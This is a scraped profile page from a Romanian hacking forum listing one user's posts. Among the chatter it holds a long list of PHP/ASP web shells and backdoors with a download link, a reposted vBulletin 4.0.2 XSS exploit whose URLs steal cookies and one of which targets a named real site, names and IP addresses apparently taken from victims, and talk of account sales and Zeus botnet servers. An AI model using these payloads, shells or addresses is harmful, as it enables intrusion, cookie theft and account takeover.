Jump to content

Gabriel87

Active Members
  • Posts

    860
  • Joined

  • Last visited

Everything posted by Gabriel87

  1. Rds
  2. Death Race 2 recomand
  3. Ma bag si eu
  4. Astia ori is prostii ori is batuti in cap PUNETI-VA MA OCHELARI DACA NU VEDETI BINE !
  5. Fara suparare.. dar nu isi fute cineva totii botii care ii are pe ddos
  6. Solu?ia de urgen?? pentru bre?a de securitate descoperit?, la sfâr?itul lunii trecute, de Microsoft, la sistemele sale de operare, trebuie obligatoriu aplicat?. Bre?a de securitate îi expune atacurilor informatice pe cei aproape un miliard de utilizatori de sisteme de operare de calculator Windows (de la XP încoace) ?i de programe de navigare pe net ?i de mesagerie electronic? produse de Microsoft, chiar dac? se viziteaz? site-uri ce au und? verde din partea programelor antivirus ?i antispam. Solu?ia dat? de Microsoft a fost prezentat? de gândul, cu o s?pt?mân? în urm?, îns? reprezentan?ii Microsoft România ?in s? precizeze c? nu este vorba de un "patch" propriu zis, respectiv de un update care s? ofere o solu?ie definitiv?, ci doar de o solu?ie provizorie, prin dezactivarea sau izolarea protocolului MHTML. Cite?te mai multe pe Vulnerabilitatea care afecteaz? 900 DE MILIOANE DE INTERNAU?I. Ce trebuie s? fac? utilizatorii Windows ? explic? pentru Gândul Todi Pruteanu, Microsoft - Gandul
  7. Pentru toti care doresc sa-si faca un blog, forum sau alte site-uri fara sa mai investeasca bani in domeniu si host, am sa va arat o lista cu cateva zeci de site-uri care ofera hosting gratuit. Nu se compara cu un hosting platit dar avand in vedere ca este moca si beneficiile sunt destul de mari, merge. Lista cu hosturile gratis : Free Web Hosting - Page 1
  8. Bravo c0smyn , dar nu cred ca mai pica nimeni in asemenea programe acuma ii la moda cookie stealer , stealer
  9. Salut , Ioane
  10. Gabriel87

    Un shell

    Nu are rost sa mai pui aici ca sunt flamanzii care isi fac cont numai sa fure conturi etc
  11. Gabriel87

    Un cpanel

    Binary Code ?
  12. Doamne dumnezeule cat de prostii sunteti unii ii dau mare dreptate lui PaxNwo .
  13. C99Shell v. 1.0 beta (5.02.2005) PHP Cyber Shell PHP GFS Web-Shell PHP NFM 1.8 PHP r57shell PHP Small Web Shell by ZaCo PHP nsTView v2.1 PHP DxShell v1.0 PHP C99madShell v. 2.0 madnet edition PHP CTT Shell PHP GRP WebShell 2.0 release build 2018 ©2006,Great PHP Crystal shell PHP Loaderz WEB Shell PHP NIX REMOTE WEB SHELL PHP Antichat Shell PHP CasuS 1.5 PHP Sincap 1.0 PHP C99Shell v. 1.0 pre-release build(safe-mode) PHP hiddens shell v1 PHP Web-shell ©ShAnKaR PHP Predator PHP KA_uShell 0.1.6 PHP NGH PHP C2007Shell v. 1.0 pre-release build #16 Modded by Adora & u9 h4c93r PHP Antichat Shell. Modified by Go0o$E PHP c0derz shell [csh] v. 0.1.1 release PHP iMHaBiRLiGi Php FTP PHP PHVayv PHP phpRemoteView PHP STNC WebShell v0.8 PHP MyShell PHP ZyklonShell PHP AK-74 Security Team Web Shell Beta Version PHP Gamma Web Shell Perl-Cgi go-shell Perl-Cgi PhpSpy Ver 2006 Perl-Cgi CmdAsp.asp.txt ASP CyberSpy5.Asp.txt ASP klasvayv.asp.txt ASP indexer.asp.txt ASP NTDaddy v1.9 ASP reader.asp.txt ASP RemExp.asp.txt ASP zehir4.asp.txt ASP Elmaliseker.txt ASP EFSO_2.txt ASP accept_language PHP Ajax_PHP Command Shell PHP Antichat Shell v1.3 PHP Ayyildiz Tim -AYT- Shell v 2.1 Biz PHP aZRaiLPhp v1.0 PHP backupsql PHP c99 PHP c99_locus7s PHP c99_madnet PHP c99_PSych0 PHP c99_w4cking PHP Crystal PHP ctt_sh PHP cybershell PHP dC3 Security Crew Shell PRiV PHP Dive Shell 1.0 - Emperor Hacking Team PHP DTool Pro PHP Dx PHP GFS web-shell ver 3.1.7 - PRiV8 PHP gfs_sh PHP h4ntu shell [powered by tsoi] PHP iMHaPFtp PHP ironshell PHP JspWebshell 1.2 PHP KAdot Universal Shell v0.1.6 PHP lamashell PHP Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit PHP load_shell PHP matamu PHP Moroccan Spamers Ma-EditioN By GhOsT PHP myshell PHP Mysql interface v1.0 PHP MySQL Web Interface Version 0.8 PHP mysql PHP mysql_tool PHP NCC-Shell PHP NetworkFileManagerPHP PHP NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version PHP nshell PHP nstview PHP PH Vayv PHP PHANTASMA PHP PHP Shell PHP php-backdoor PHP php-include-w-shell PHP pHpINJ PHP PHPJackal PHP PHPRemoteView PHP Private-i3lue PHP pws PHP r57 PHP r57_iFX PHP r57_kartal PHP r57_Mohajer22 PHP rootshell PHP ru24_post_sh PHP s72 Shell v1.1 Coding PHP Safe0ver Shell -Safe Mod Bypass By Evilc0der PHP Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 PHP SimAttacker - Vrsion 1.0.0 - priv8 4 My friend PHP simple_cmd PHP simple-backdoor PHP SimShell 1.0 - Simorgh Security MGZ PHP SnIpEr_SA Shell PHP Uploader PHP WinX Shell PHP Worse Linux Shell PHP zacosmall PHP Antichat Shell v1.3 PHP Ayyildiz Tim -AYT- Shell v 2.1 Biz PHP aZRaiLPhp v1.0 PHP CrystalShell v.1 PHP Cyber Shell (v 1.0) PHP dC3 Security Crew Shell PRiV PHP Dive Shell 1.0 - Emperor Hacking Team PHP DxShell.1.0 PHP ELMALISEKER Backd00r ASP GFS web-shell ver 3.1.7 - PRiV8 PHP h4ntu shell [powered by tsoi] PHP JspWebshell 1.2 JSP KAdot Universal Shell v0.1.6 PHP Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit PHP Macker's Private PHPShell PHP Mysql interface v1.0 PHP MySQL Web Interface Version 0.8 PHP NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version PHP Perl Web Shell by RST-GHC PL Private-i3lue PHP RedhatC99 [login=redhat-pass=root] PHP Rootshell.v.1.0 PHP s72 Shell v1.1 Coding PHP Safe0ver Shell -Safe Mod Bypass By Evilc0der PHP Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 PHP SimAttacker - Vrsion 1.0.0 - priv8 4 My friend PHP SimShell 1.0 - Simorgh Security MGZs PHP WinX Shell PHP Worse Linux Shell PHP Download http://hotfile.com/dl/87211019/14c40a7/Top_100_Shells_H4CK3R.IN.rar.html
  14. Exploit Code : # SecurityReason Note : # Fix : http://www.vbulletin.com/forum/showthread.php?346486-Security-Fix-Releases-3.7.7-and-4.0.2-PL-2 [+] Vbulletin 4.0.2 XSS Vulnerability 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 I'm 5ubzer0 member from Inj3ct0r Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Discovered By: 5ubzer0 [+] My id : http://inj3ct0r.com/author/2307 [+] Original : http://inj3ct0r.com/exploits/9697 # Version: Vbulletin 4.0.2 www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script> www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script> Exemple: http://www.forumjogosonline.com.br/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E # ~ - [ [ : Inj3ct0r : ] ]
  15. /// <author>sunjester / fusecurity.com</author> /// <summary> /// sends email from an smtp server /// </summary> /// <param name="toEmail">who to send it to</param> /// <param name="fromEmail">who it's from</param> /// <param name="smtpAddr">the smtp server</param> /// <param name="smtpPort">the smtp port</param> /// <param name="smtpUser">the username for the smtp server</param> /// <param name="smtpPass">the password for the smtp server</param> /// <param name="smtpSubject">the subject of the email</param> /// <param name="ssl">enable ssl?</param> /// <param name="content">message to send, body of the email</param> /// <returns>string</returns> public string sendMessage(string toEmail, string fromEmail, string smtpAddr, int smtpPort, string smtpUser, string smtpPass, string smtpSubject, bool ssl, string content) { try { MailMessage msg = new MailMessage(); msg.To.Add(toEmail); msg.From = new MailAddress(fromEmail); msg.Subject = smtpSubject; msg.Body = content; SmtpClient client = new SmtpClient(smtpAddr); client.Port = smtpPort; client.EnableSsl = ssl; client.Credentials = new NetworkCredential(smtpUser, smtpPass); client.Send(msg); return "success"; } catch (Exception ex) { return "error: "+ex.Message; } } Sursa : http://h4ck3r.in/board/showthread.php?tid=1803
  16. Eu la femei de astea fitoase si cu limba romana in punca ma ma c-am agita
  17. Cum spune si title vand cont Orange pentru mai multe detalii PM me !
  18. Se folosete de un soft care are optiunea spread facebook si yahoo ? sau e un script php
  19. Ti-am lasat si eu pm
  20. Ma gandesc ca iara ii server de Zeus Botnet
  21. Si eu am vrut sa il cumpar dar am auzit ca numai se ocupa de el de update etc
  22. alex chacon 64.34.110.6 CALIFORNIA, LOS ANGELES eaguilar scorpion 64.56.75.105 astea doua le-am incercat si is nologine oricum ma ajuta si nologinele ms mult
  23. Nu e scris de ghost e scris de Madman sursa a lui ghost e mult mai buna si e privata nu cred ca o da el
×
×
  • Create New...